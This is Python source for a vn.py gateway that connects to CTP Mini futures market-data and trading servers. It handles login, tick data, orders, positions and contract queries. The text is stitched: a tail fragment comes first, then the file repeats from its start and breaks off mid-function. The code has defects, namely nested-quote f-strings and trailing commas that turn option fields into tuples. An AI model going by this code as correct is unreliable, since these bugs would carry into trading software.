if not error or not error["ErrorID"]:
return
self.gateway.write_error("行情订阅失败", error)
def onRtnDepthMarketData(self, data: dict):
"""
Callback of tick data update.
"""
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
return
timestamp = f"{data["ActionDay"]} {data["UpdateTime"]}.{int(data["UpdateMillisec"]/100)}"
tick = TickData(
symbol=symbol,
exchange=exchange,
datetime=datetime.strptime(timestamp, "%Y%m%d %H:%M:%S.%f"),
name=symbol_name_map[symbol],
volume=data["Volume"],
open_interest=data["OpenInterest"],
last_price=data["LastPrice"],
limit_up=data["UpperLimitPrice"],
limit_down=data["LowerLimitPrice"],
open_price=data["OpenPrice"],
high_price=data["HighestPrice"],
low_price=data["LowestPrice"],
pre_close=data["PreClosePrice"],
bid_price_1=data["BidPrice1"],
ask_price_1=data["AskPrice1"],
bid_volume_1=data["BidVolume1"],
ask_volume_1=data["AskVolume1"],
gateway_name=self.gateway_name
)
if data["BidPrice2"]:
tick.bid_price_2 = data["BidPrice2"]
tick.bid_price_3 = data["BidPrice3"]
tick.bid_price_4 = data["BidPrice4"]
tick.bid_price_5 = data["BidPrice5"]
tick.ask_price_2 = data["AskPrice2"]
tick.ask_price_3 = data["AskPrice3"]
tick.ask_price_4 = data["AskPrice4"]
tick.ask_price_5 = data["AskPrice5"]
tick.bid_volume_2 = data["BidVolume2"]
tick.bid_volume_3 = data["BidVolume3"]
tick.bid_volume_4 = data["BidVolume4"]
tick.bid_volume_5 = data["BidVolume5"]
tick.ask_volume_2 = data["AskVolume2"]
tick.ask_volume_3 = data["AskVolume3"]
tick.ask_volume_4 = data["AskVolume4"]
tick.ask_volume_5 = data["AskVolume5"]
self.gateway.on_tick(tick)
def connect(self, address: str, userid: str, password: str, brokerid: int):
"""
Start connection to server.
"""
self.userid = userid
self.password = password
self.brokerid = brokerid
# If not connected, then start connection first.
if not self.connect_status:
path = get_folder_path(self.gateway_name.lower())
self.createFtdcMdApi(str(path) + "\\Md")
self.registerFront(address)
self.init()
self.connect_status = True
# If already connected, then login immediately.
elif not self.login_status:
self.login()
def login(self):
"""
Login onto server.
"""
req = {
"UserID": self.userid,
"Password": self.password,
"BrokerID": self.brokerid
}
self.reqid += 1
self.reqUserLogin(req, self.reqid)
def subscribe(self, req: SubscribeRequest):
"""
Subscribe to tick data update.
"""
if self.login_status:
self.subscribeMarketData(req.symbol)
self.subscribed.add(req.symbol)
def close(self):
"""
Close the connection.
"""
if self.connect_status:
self.exit()
class MiniTdApi(TdApi):
""""""
def __init__(self, gateway):
"""Constructor"""
super(MiniTdApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.reqid = 0
self.order_ref = 0
self.connect_status = False
self.login_status = False
self.auth_staus = False
self.login_failed = False
self.userid = ""
self.password = ""
self.brokerid = ""
self.auth_code = ""
self.appid = ""
self.product_info = ""
self.frontid = 0
self.sessionid = 0
self.order_data = []
self.trade_data = []
self.positions = {}
self.sysid_orderid_map = {}
def onFrontConnected(self):
""""""
self.gateway.write_log("交易服务器连接成功")
if self.auth_code:
self.authenticate()
else:
self.login()
def onFrontDisconnected(self, reason: int):
""""""
self.login_status = False
self.gateway.write_log(f"交易服务器连接断开,原因{reason}")
def onRspAuthenticate(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error['ErrorID']:
self.auth_staus = True
self.gateway.write_log("交易服务器授权验证成功")
self.login()
else:
self.gateway.write_error("交易服务器授权验证失败", error)
def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error["ErrorID"]:
self.frontid = data["FrontID"]
self.sessionid = data["SessionID"]
self.login_status = True
self.gateway.write_log("交易服务器登录成功")
# Get instrument data directly without confirm settlement
self.reqid += 1
self.reqQryInstrument({}, self.reqid)
else:
self.login_failed = True
self.gateway.write_error("交易服务器登录失败", error)
def onRspOrderInsert(self, data: dict, error: dict, reqid: int, last: bool):
""""""
order_ref = data["OrderRef"]
orderid = f"{self.frontid}_{self.sessionid}_{order_ref}"
symbol = data["InstrumentID"]
exchange = symbol_exchange_map[symbol]
order = OrderData(
symbol=symbol,
exchange=exchange,
orderid=orderid,
direction=DIRECTION_MINI2VT[data["Direction"]],
offset=OFFSET_MINI2VT.get(data["CombOffsetFlag"], Offset.NONE),
price=data["LimitPrice"],
volume=data["VolumeTotalOriginal"],
status=Status.REJECTED,
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
self.gateway.write_error("交易委托失败", error)
def onRspOrderAction(self, data: dict, error: dict, reqid: int, last: bool):
""""""
self.gateway.write_error("交易撤单失败", error)
def onRspQueryMaxOrderVolume(self, data: dict, error: dict, reqid: int, last: bool):
""""""
pass
def onRspSettlementInfoConfirm(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback of settlment info confimation.
"""
pass
def onRspQryInvestorPosition(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if data and data["InstrumentID"] in symbol_exchange_map:
# Get buffered position object
key = f"{data["InstrumentID"], data["PosiDirection"]}"
position = self.positions.get(key, None)
if not position:
position = PositionData(
symbol=data["InstrumentID"],
exchange=symbol_exchange_map[data["InstrumentID"]],
direction=DIRECTION_MINI2VT[data["PosiDirection"]],
gateway_name=self.gateway_name
)
self.positions[key] = position
# For SHFE position data update
if position.exchange == Exchange.SHFE:
if data["YdPosition"] and not data["TodayPosition"]:
position.yd_volume = data["Position"]
# For other exchange position data update
else:
position.yd_volume = data["Position"] - data["TodayPosition"]
# Get contract size (spread contract has no size value)
size = symbol_size_map.get(position.symbol, 0)
# Calculate previous position cost
cost = position.price * position.volume * size
# Update new position volume
position.volume += data["Position"]
position.pnl += data["PositionProfit"]
# Calculate average position price
if position.volume and size:
cost += data["PositionCost"]
position.price = cost / (position.volume * size)
# Get frozen volume
if position.direction == Direction.LONG:
position.frozen += data["ShortFrozen"]
else:
position.frozen += data["LongFrozen"]
if last:
for position in self.positions.values():
self.gateway.on_position(position)
self.positions.clear()
def onRspQryTradingAccount(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if "AccountID" not in data:
return
account = AccountData(
accountid=data["AccountID"],
balance=data["Balance"],
frozen=data["FrozenMargin"] +
data["FrozenCash"] + data["FrozenCommission"],
gateway_name=self.gateway_name
)
account.available = data["Available"]
self.gateway.on_account(account)
def onRspQryInstrument(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback of instrument query.
"""
product = PRODUCT_MINI2VT.get(data.get("ProductClass", None), None)
if product:
contract = ContractData(
symbol=data["InstrumentID"],
exchange=EXCHANGE_MINI2VT[data["ExchangeID"]],
name=data["InstrumentName"],
product=product,
size=data["VolumeMultiple"],
pricetick=data["PriceTick"],
gateway_name=self.gateway_name
)
# For option only
if contract.product == Product.OPTION:
contract.option_underlying = data["UnderlyingInstrID"],
contract.option_type = OPTIONTYPE_MINI2VT.get(
data["OptionsType"], None),
contract.option_strike = data["StrikePrice"],
contract.option_expiry = datetime.strptime(
data["ExpireDate"], "%Y%m%d"),
self.gateway.on_contract(contract)
symbol_exchange_map[contract.symbol] = contract.exchange
symbol_name_map[contract.symbol] = contract.name
symbol_size_map[contract.symbol] = contract.size
if last:
self.gateway.write_log("合约信息查询成功")
for data in self.order_data:
self.onRtnOrder(data)
self.order_data.clear()
for data in self.trade_data:
self.onRtnTrade(data)
self.trade_data.clear()
def onRtnOrder(self, data: dict):
"""
Callback of order status update.
"""
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
self.order_data.append(data)
return
frontid = data["FrontID"]
sessionid = data["SessionID"]
order_ref = data["OrderRef"]
orderid = f"{frontid}_{sessionid}_{order_ref}"
order = OrderData(
symbol=symbol,
exchange=exchange,
orderid=orderid,
type=ORDERTYPE_MINI2VT[data["OrderPriceType"]],
direction=DIRECTION_MINI2VT[data["Direction"]],
offset=OFFSET_MINI2VT[data["CombOffsetFlag"]],
price=data["LimitPrice"],
volume=data["VolumeTotalOriginal"],
traded=data["VolumeTraded"],
status=STATUS_MINI2VT[data["OrderStatus"]],
time=data["InsertTime"],
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
self.sysid_orderid_map[data["OrderSysID"]] = orderid
def onRtnTrade(self, data: dict):
"""
Callback of trade status update.
"""
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
self.trade_data.append(data)
return
orderid = self.sysid_orderid_map[data["OrderSysID"]]
trade = TradeData(
symbol=symbol,
exchange=exchange,
orderid=orderid,
tradeid=data["TradeID"],
direction=DIRECTION_MINI2VT[data["Direction"]],
offset=OFFSET_MINI2VT[data["OffsetFlag"]],
price=data["Price"],
volume=data["Volume"],
time=data["TradeTime"],
gateway_name=self.gateway_name
)
self.gateway.on_trade(trade)
def connect(
self,
address: str,
userid: str,
password: str,
brokerid: int,
auth_code: str,
appid: str,
product_info
):
"""
Start connection to server.
"""
self.userid = userid
self.password = password
self.brokerid = brokerid
self.auth_code = auth_code
self.appid = appid
self.product_info = product_info
if not self.connect_status:
path = get_folder_path(self.gateway_name.lower())
self.createFtdcTraderApi(str(path) + "\\Td")
self.subscribePrivateTopic(0)
self.subscribePublicTopic(0)
self.registerFront(address)
self.init()
self.connect_status = True
else:
self.authenticate()
def authenticate(self):
"""
Authenticate with auth_code and appid.
"""
req = {
"UserID": self.userid,
"BrokerID": self.brokerid,
"AuthCode": self.auth_code,
"AppID": self.appid
}
if self.product_info:
req["UserProductInfo"] = self.product_info
self.reqid += 1
self.reqAuthenticate(req, self.reqid)
def login(self):
"""
Login onto server.
"""
if self.login_failed:
return
req = {
"UserID": self.userid,
"Password": self.password,
"BrokerID": self.brokerid,
"AppID": self.appid
}
if self.product_info:
req["UserProductInfo"] = self.product_info
self.reqid += 1
self.reqUserLogin(req, self.reqid)
def send_order(self, req: OrderRequest):
"""
Send new order.
"""
self.order_ref += 1
mini_req = {
"InstrumentID": req.symbol,
"ExchangeID": req.exchange.value,
"LimitPrice": req.price,
"VolumeTotalOriginal": int(req.volume),
"OrderPriceType": ORDERTYPE_VT2MINI.get(req.type, ""),
"Direction": DIRECTION_VT2MINI.get(req.direction, ""),
"CombOffsetFlag": OFFSET_VT2MINI.get(req.offset, ""),
"OrderRef": str(self.order_ref),
"InvestorID": self.userid,
"UserID": self.userid,
"BrokerID": self.brokerid,
"CombHedgeFlag": THOST_FTDC_HF_Speculation,
"ContingentCondition": THOST_FTDC_CC_Immediately,
"ForceCloseReason": THOST_FTDC_FCC_NotForceClose,
"IsAutoSuspend": 0,
"TimeCondition": THOST_FTDC_TC_GFD,
"VolumeCondition": THOST_FTDC_VC_AV,
"MinVolume": 1
}
if req.type == OrderType.FAK:
mini_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
mini_req["TimeCondition"] = THOST_FTDC_TC_IOC
mini_req["VolumeCondition"] = THOST_FTDC_VC_AV
elif req.type == OrderType.FOK:
mini_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
mini_req["TimeCondition"] = THOST_FTDC_TC_IOC
mini_req["VolumeCondition"] = THOST_FTDC_VC_CV
self.reqid += 1
self.reqOrderInsert(mini_req, self.reqid)
orderid = f"{self.frontid}_{self.sessionid}_{self.order_ref}"
order = req.create_order_data(orderid, self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel existing order.
"""
frontid, sessionid, order_ref = req.orderid.split("_")
mini_req = {
"InstrumentID": req.symbol,
"ExchangeID": req.exchange.value,
"OrderRef": order_ref,
"FrontID": int(frontid),
"SessionID": int(sessionid),
"ActionFlag": THOST_FTDC_AF_Delete,
"BrokerID": self.brokerid,
"InvestorID": self.userid
}
self.reqid += 1
self.reqOrderAction(mini_req, self.reqid)
def query_account(self):
"""
Query account balance data.
"""
self.reqid += 1
self.reqQryTradingAccount({}, self.reqid)
def query_position(self):
"""
Query position holding data.
"""
if not symbol_exchange_map:
return
req = {
"BrokerID": self.brokerid,
"InvestorID": self.userid
}
self.reqid += 1
self.reqQryInvestorPosition(req, self.reqid)
def close(self):
""""""
if self.connect_status:
self.exit()
| """
"""
from datetime import datetime
from vnpy.api.mini import (
THOST_FTDC_OAS_Submitted,
THOST_FTDC_OAS_Accepted,
THOST_FTDC_OAS_Rejected,
THOST_FTDC_OST_NoTradeQueueing,
THOST_FTDC_OST_PartTradedQueueing,
THOST_FTDC_OST_AllTraded,
THOST_FTDC_OST_Canceled,
THOST_FTDC_D_Buy,
THOST_FTDC_D_Sell,
THOST_FTDC_PD_Long,
THOST_FTDC_PD_Short,
THOST_FTDC_OPT_LimitPrice,
THOST_FTDC_OPT_AnyPrice,
THOST_FTDC_OF_Open,
THOST_FTDC_OFEN_Close,
THOST_FTDC_OFEN_CloseYesterday,
THOST_FTDC_OFEN_CloseToday,
THOST_FTDC_PC_Futures,
THOST_FTDC_PC_Options,
THOST_FTDC_PC_Combination,
THOST_FTDC_CP_CallOptions,
THOST_FTDC_CP_PutOptions,
THOST_FTDC_HF_Speculation,
THOST_FTDC_CC_Immediately,
THOST_FTDC_FCC_NotForceClose,
THOST_FTDC_TC_GFD,
THOST_FTDC_VC_AV,
THOST_FTDC_TC_IOC,
THOST_FTDC_VC_CV,
THOST_FTDC_AF_Delete
)
from vnpy.trader.constant import (
Direction,
Offset,
Exchange,
OrderType,
Product,
Status,
OptionType
)
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
OrderRequest,
CancelRequest,
SubscribeRequest,
)
from vnpy.trader.utility import get_folder_path
from vnpy.trader.event import EVENT_TIMER
from .vnminimd import MdApi
from .vnminitd import TdApi
STATUS_MINI2VT = {
THOST_FTDC_OAS_Submitted: Status.SUBMITTING,
THOST_FTDC_OAS_Accepted: Status.SUBMITTING,
THOST_FTDC_OAS_Rejected: Status.REJECTED,
THOST_FTDC_OST_NoTradeQueueing: Status.NOTTRADED,
THOST_FTDC_OST_PartTradedQueueing: Status.PARTTRADED,
THOST_FTDC_OST_AllTraded: Status.ALLTRADED,
THOST_FTDC_OST_Canceled: Status.CANCELLED
}
DIRECTION_VT2MINI = {
Direction.LONG: THOST_FTDC_D_Buy,
Direction.SHORT: THOST_FTDC_D_Sell
}
DIRECTION_MINI2VT = {v: k for k, v in DIRECTION_VT2MINI.items()}
DIRECTION_MINI2VT[THOST_FTDC_PD_Long] = Direction.LONG
DIRECTION_MINI2VT[THOST_FTDC_PD_Short] = Direction.SHORT
ORDERTYPE_VT2MINI = {
OrderType.LIMIT: THOST_FTDC_OPT_LimitPrice,
OrderType.MARKET: THOST_FTDC_OPT_AnyPrice
}
ORDERTYPE_MINI2VT = {v: k for k, v in ORDERTYPE_VT2MINI.items()}
OFFSET_VT2MINI = {
Offset.OPEN: THOST_FTDC_OF_Open,
Offset.CLOSE: THOST_FTDC_OFEN_Close,
Offset.CLOSETODAY: THOST_FTDC_OFEN_CloseToday,
Offset.CLOSEYESTERDAY: THOST_FTDC_OFEN_CloseYesterday,
}
OFFSET_MINI2VT = {v: k for k, v in OFFSET_VT2MINI.items()}
EXCHANGE_MINI2VT = {
"CFFEX": Exchange.CFFEX,
"SHFE": Exchange.SHFE,
"CZCE": Exchange.CZCE,
"DCE": Exchange.DCE,
"INE": Exchange.INE
}
PRODUCT_MINI2VT = {
THOST_FTDC_PC_Futures: Product.FUTURES,
THOST_FTDC_PC_Options: Product.OPTION,
THOST_FTDC_PC_Combination: Product.SPREAD
}
OPTIONTYPE_MINI2VT = {
THOST_FTDC_CP_CallOptions: OptionType.CALL,
THOST_FTDC_CP_PutOptions: OptionType.PUT
}
symbol_exchange_map = {}
symbol_name_map = {}
symbol_size_map = {}
class MinitestGateway(BaseGateway):
"""
VN Trader Gateway for CTP Mini.
"""
default_setting = {
"用户名": "",
"密码": "",
"经纪商代码": "",
"交易服务器": "",
"行情服务器": "",
"产品名称": "",
"授权编码": "",
"产品信息": ""
}
exchanges = list(EXCHANGE_MINI2VT.values())
def __init__(self, event_engine):
"""Constructor"""
super().__init__(event_engine, "MINITEST")
self.td_api = MiniTdApi(self)
self.md_api = MiniMdApi(self)
def connect(self, setting: dict):
""""""
userid = setting["用户名"]
password = setting["密码"]
brokerid = setting["经纪商代码"]
td_address = setting["交易服务器"]
md_address = setting["行情服务器"]
appid = setting["产品名称"]
auth_code = setting["授权编码"]
product_info = setting["产品信息"]
if not td_address.startswith("tcp://"):
td_address = "tcp://" + td_address
if not md_address.startswith("tcp://"):
md_address = "tcp://" + md_address
self.td_api.connect(td_address, userid, password,
brokerid, auth_code, appid, product_info)
self.md_api.connect(md_address, userid, password, brokerid)
self.init_query()
def subscribe(self, req: SubscribeRequest):
""""""
self.md_api.subscribe(req)
def send_order(self, req: OrderRequest):
""""""
return self.td_api.send_order(req)
def cancel_order(self, req: CancelRequest):
""""""
self.td_api.cancel_order(req)
def query_account(self):
""""""
self.td_api.query_account()
def query_position(self):
""""""
self.td_api.query_position()
def close(self):
""""""
self.td_api.close()
self.md_api.close()
def write_error(self, msg: str, error: dict):
""""""
error_id = error["ErrorID"]
error_msg = error["ErrorMsg"]
msg = f"{msg},代码:{error_id},信息:{error_msg}"
self.write_log(msg)
def process_timer_event(self, event):
""""""
self.count += 1
if self.count < 2:
return
self.count = 0
func = self.query_functions.pop(0)
func()
self.query_functions.append(func)
def init_query(self):
""""""
self.count = 0
self.query_functions = [self.query_account, self.query_position]
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
class MiniMdApi(MdApi):
""""""
def __init__(self, gateway):
"""Constructor"""
super(MiniMdApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.reqid = 0
self.connect_status = False
self.login_status = False
self.subscribed = set()
self.userid = ""
self.password = ""
self.brokerid = ""
def onFrontConnected(self):
"""
Callback when front server is connected.
"""
self.gateway.write_log("行情服务器连接成功")
self.login()
def onFrontDisconnected(self, reason: int):
"""
Callback when front server is disconnected.
"""
self.login_status = False
self.gateway.write_log(f"行情服务器连接断开,原因{reason}")
def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback when user is logged in.
"""
if not error["ErrorID"]:
self.login_status = True
self.gateway.write_log("行情服务器登录成功")
for symbol in self.subscribed:
self.subscribeMarketData(symbol)
else:
self.gateway.write_error("行情服务器登录失败", error)
def onRspError(self, error: dict, reqid: int, last: bool):
"""
Callback when error occured.
"""
self.gateway.write_error("行情接口报错", error)
def onRspSubMarketData(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error or not error["ErrorID"]:
return
self.gateway.write_error("行情订阅失败", error)
def onRtnDepthMarketData(self, data: dict):
"""
Callback of tick data update.
"""
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
return
timestamp = f"{data['ActionDay']} {data['UpdateTime']}.{int(data['UpdateMillisec']/100)}"
tick = TickData(
symbol=symbol,
exchange=exchange,
datetime=datetime.strptime(timestamp, "%Y%m%d %H:%M:%S.%f"),
name=symbol_name_map[symbol],
volume=data["Volume"],
open_interest=data["OpenInterest"],
last_price=data["LastPrice"],
limit_up=data["UpperLimitPrice"],
limit_down=data["LowerLimitPrice"],
open_price=data["OpenPrice"],
high_price=data["HighestPrice"],
low_price=data["LowestPrice"],
pre_close=data["PreClosePrice"],
bid_price_1=data["BidPrice1"],
ask_price_1=data["AskPrice1"],
bid_volume_1=data["BidVolume1"],
ask_volume_1=data["AskVolume1"],
gateway_name=self.gateway_name
)
if data["BidPrice2"]:
tick.bid_price_2 = data["BidPrice2"]
tick.bid_price_3 = data["BidPrice3"]
tick.bid_price_4 = data["BidPrice4"]
tick.bid_price_5 = data["BidPrice5"]
tick.ask_price_2 = data["AskPrice2"]
tick.ask_price_3 = data["AskPrice3"]
tick.ask_price_4 = data["AskPrice4"]
tick.ask_price_5 = data["AskPrice5"]
tick.bid_volume_2 = data["BidVolume2"]
tick.bid_volume_3 = data["BidVolume3"]
tick.bid_volume_4 = data["BidVolume4"]
tick.bid_volume_5 = data["BidVolume5"]
tick.ask_volume_2 = data["AskVolume2"]
tick.ask_volume_3 = data["AskVolume3"]
tick.ask_volume_4 = data["AskVolume4"]
tick.ask_volume_5 = data["AskVolume5"]
self.gateway.on_tick(tick)
def connect(self, address: str, userid: str, password: str, brokerid: int):
"""
Start connection to server.
"""
self.userid = userid
self.password = password
self.brokerid = brokerid
# If not connected, then start connection first.
if not self.connect_status:
path = get_folder_path(self.gateway_name.lower())
self.createFtdcMdApi(str(path) + "\\Md")
self.registerFront(address)
self.init()
self.connect_status = True
# If already connected, then login immediately.
elif not self.login_status:
self.login()
def login(self):
"""
Login onto server.
"""
req = {
"UserID": self.userid,
"Password": self.password,
"BrokerID": self.brokerid
}
self.reqid += 1
self.reqUserLogin(req, self.reqid)
def subscribe(self, req: SubscribeRequest):
"""
Subscribe to tick data update.
"""
if self.login_status:
self.subscribeMarketData(req.symbol)
self.subscribed.add(req.symbol)
def close(self):
"""
Close the connection.
"""
if self.connect_status:
self.exit()
class MiniTdApi(TdApi):
""""""
def __init__(self, gateway):
"""Constructor"""
super(MiniTdApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.reqid = 0
self.order_ref = 0
self.connect_status = False
self.login_status = False
self.auth_staus = False
self.login_failed = False
self.userid = ""
self.password = ""
self.brokerid = ""
self.auth_code = ""
self.appid = ""
self.product_info = ""
self.frontid = 0
self.sessionid = 0
self.order_data = []
self.trade_data = []
self.positions = {}
self.sysid_orderid_map = {}
def onFrontConnected(self):
""""""
self.gateway.write_log("交易服务器连接成功")
if self.auth_code:
self.authenticate()
else:
self.login()
def onFrontDisconnected(self, reason: int):
""""""
self.login_status = False
self.gateway.write_log(f"交易服务器连接断开,原因{reason}")
def onRspAuthenticate(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error['ErrorID']:
self.auth_staus = True
self.gateway.write_log("交易服务器授权验证成功")
self.login()
else:
self.gateway.write_error("交易服务器授权验证失败", error)
def onRspUserLogin(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if not error["ErrorID"]:
self.frontid = data["FrontID"]
self.sessionid = data["SessionID"]
self.login_status = True
self.gateway.write_log("交易服务器登录成功")
# Get instrument data directly without confirm settlement
self.reqid += 1
self.reqQryInstrument({}, self.reqid)
else:
self.login_failed = True
self.gateway.write_error("交易服务器登录失败", error)
def onRspOrderInsert(self, data: dict, error: dict, reqid: int, last: bool):
""""""
order_ref = data["OrderRef"]
orderid = f"{self.frontid}_{self.sessionid}_{order_ref}"
symbol = data["InstrumentID"]
exchange = symbol_exchange_map[symbol]
order = OrderData(
symbol=symbol,
exchange=exchange,
orderid=orderid,
direction=DIRECTION_MINI2VT[data["Direction"]],
offset=OFFSET_MINI2VT.get(data["CombOffsetFlag"], Offset.NONE),
price=data["LimitPrice"],
volume=data["VolumeTotalOriginal"],
status=Status.REJECTED,
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
self.gateway.write_error("交易委托失败", error)
def onRspOrderAction(self, data: dict, error: dict, reqid: int, last: bool):
""""""
self.gateway.write_error("交易撤单失败", error)
def onRspQueryMaxOrderVolume(self, data: dict, error: dict, reqid: int, last: bool):
""""""
pass
def onRspSettlementInfoConfirm(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback of settlment info confimation.
"""
pass
def onRspQryInvestorPosition(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if data and data["InstrumentID"] in symbol_exchange_map:
# Get buffered position object
key = f"{data['InstrumentID'], data['PosiDirection']}"
position = self.positions.get(key, None)
if not position:
position = PositionData(
symbol=data["InstrumentID"],
exchange=symbol_exchange_map[data["InstrumentID"]],
direction=DIRECTION_MINI2VT[data["PosiDirection"]],
gateway_name=self.gateway_name
)
self.positions[key] = position
# For SHFE position data update
if position.exchange == Exchange.SHFE:
if data["YdPosition"] and not data["TodayPosition"]:
position.yd_volume = data["Position"]
# For other exchange position data update
else:
position.yd_volume = data["Position"] - data["TodayPosition"]
# Get contract size (spread contract has no size value)
size = symbol_size_map.get(position.symbol, 0)
# Calculate previous position cost
cost = position.price * position.volume * size
# Update new position volume
position.volume += data["Position"]
position.pnl += data["PositionProfit"]
# Calculate average position price
if position.volume and size:
cost += data["PositionCost"]
position.price = cost / (position.volume * size)
# Get frozen volume
if position.direction == Direction.LONG:
position.frozen += data["ShortFrozen"]
else:
position.frozen += data["LongFrozen"]
if last:
for position in self.positions.values():
self.gateway.on_position(position)
self.positions.clear()
def onRspQryTradingAccount(self, data: dict, error: dict, reqid: int, last: bool):
""""""
if "AccountID" not in data:
return
account = AccountData(
accountid=data["AccountID"],
balance=data["Balance"],
frozen=data["FrozenMargin"] +
data["FrozenCash"] + data["FrozenCommission"],
gateway_name=self.gateway_name
)
account.available = data["Available"]
self.gateway.on_account(account)
def onRspQryInstrument(self, data: dict, error: dict, reqid: int, last: bool):
"""
Callback of instrument query.
"""
product = PRODUCT_MINI2VT.get(data.get("ProductClass", None), None)
if product:
contract = ContractData(
symbol=data["InstrumentID"],
exchange=EXCHANGE_MINI2VT[data["ExchangeID"]],
name=data["InstrumentName"],
product=product,
size=data["VolumeMultiple"],
pricetick=data["PriceTick"],
gateway_name=self.gateway_name
)
# For option only
if contract.product == Product.OPTION:
contract.option_underlying = data["UnderlyingInstrID"],
contract.option_type = OPTIONTYPE_MINI2VT.get(
data["OptionsType"], None),
contract.option_strike = data["StrikePrice"],
contract.option_expiry = datetime.strptime(
data["ExpireDate"], "%Y%m%d"),
self.gateway.on_contract(contract)
symbol_exchange_map[contract.symbol] = contract.exchange
symbol_name_map[contract.symbol] = contract.name
symbol_size_map[contract.symbol] = contract.size
if last:
self.gateway.write_log("合约信息查询成功")
for data in self.order_data:
self.onRtnOrder(data)
self.order_data.clear()
for data in self.trade_data:
self.onRtnTrade(data)
self.trade_data.clear()
def onRtnOrder(self, data: dict):
"""
Callback of order status update.
"""
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
self.order_data.append(data)
return
frontid = data["FrontID"]
sessionid = data["SessionID"]
order_ref = data["OrderRef"]
orderid = f"{frontid}_{sessionid}_{order_ref}"
order = OrderData(
symbol=symbol,
exchange=exchange,
orderid=orderid,
type=ORDERTYPE_MINI2VT[data["OrderPriceType"]],
direction=DIRECTION_MINI2VT[data["Direction"]],
offset=OFFSET_MINI2VT[data["CombOffsetFlag"]],
price=data["LimitPrice"],
volume=data["VolumeTotalOriginal"],
traded=data["VolumeTraded"],
status=STATUS_MINI2VT[data["OrderStatus"]],
time=data["InsertTime"],
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
self.sysid_orderid_map[data["OrderSysID"]] = orderid
def onRtnTrade(self, data: dict):
"""
Callback of trade status update.
"""
symbol = data["InstrumentID"]
exchange = symbol_exchange_map.get(symbol, "")
if not exchange:
self.trade_data.append(data)
return
orderid = self.sysid_orderid_map[data["OrderSysID"]]
trade = TradeData(
symbol=symbol,
exchange=exchange,
orderid=orderid,
tradeid=data["TradeID"],
direction=DIRECTION_MINI2VT[data["Direction"]],
offset=OFFSET_MINI2VT[data["OffsetFlag"]],
price=data["Price"],
volume=data["Volume"],
time=data["TradeTime"],
gateway_name=self.gateway_name
)
self.gateway.on_trade(trade)
def connect(
self,
address: str,
userid: str,
password: str,
brokerid: int,
auth_code: str,
appid: str,
product_info
):
"""
Start connection to server.
"""
self.userid = userid
self.password = password
self.brokerid = brokerid
self.auth_code = auth_code
self.appid = appid
self.product_info = product_info
if not self.connect_status:
path = get_folder_path(self.gateway_name.lower())
self.createFtdcTraderApi(str(path) + "\\Td")
self.subscribePrivateTopic(0)
self.subscribePublicTopic(0)
self.registerFront(address)
self.init()
self.connect_status = True
else:
self.authenticate()
def authenticate(self):
"""
Authenticate with auth_code and appid.
"""
req = {
"UserID": self.userid,
"BrokerID": self.brokerid,
"AuthCode": self.auth_code,
"AppID": self.appid
}
if self.product_info:
req["UserProductInfo"] = self.product_info
self.reqid += 1
self.reqAuthenticate(req, self.reqid)
def login(self):
"""
Login onto server.
"""
if self.login_failed:
return
req = {
"UserID": self.userid,
"Password": self.password,
"BrokerID": self.brokerid,
"AppID": self.appid
}
if self.product_info:
req["UserProductInfo"] = self.product_info
self.reqid += 1
self.reqUserLogin(req, self.reqid)
def send_order(self, req: OrderRequest):
"""
Send new order.
"""
self.order_ref += 1
mini_req = {
"InstrumentID": req.symbol,
"ExchangeID": req.exchange.value,
"LimitPrice": req.price,
"VolumeTotalOriginal": int(req.volume),
"OrderPriceType": ORDERTYPE_VT2MINI.get(req.type, ""),
"Direction": DIRECTION_VT2MINI.get(req.direction, ""),
"CombOffsetFlag": OFFSET_VT2MINI.get(req.offset, ""),
"OrderRef": str(self.order_ref),
"InvestorID": self.userid,
"UserID": self.userid,
"BrokerID": self.brokerid,
"CombHedgeFlag": THOST_FTDC_HF_Speculation,
"ContingentCondition": THOST_FTDC_CC_Immediately,
"ForceCloseReason": THOST_FTDC_FCC_NotForceClose,
"IsAutoSuspend": 0,
"TimeCondition": THOST_FTDC_TC_GFD,
"VolumeCondition": THOST_FTDC_VC_AV,
"MinVolume": 1
}
if req.type == OrderType.FAK:
mini_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
mini_req["TimeCondition"] = THOST_FTDC_TC_IOC
mini_req["VolumeCondition"] = THOST_FTDC_VC_AV
elif req.type == OrderType.FOK:
mini_req["OrderPriceType"] = THOST_FTDC_OPT_LimitPrice
mini_req["TimeCondition"] = THOST_FTDC_TC_IOC
mini_req["VolumeCondition"] = THOST_FTDC_VC_CV
self.reqid += 1
self.reqOrderInsert(mini_req, self.reqid)
orderid = f"{self.frontid}_{self.sessionid}_{self.order_ref}"
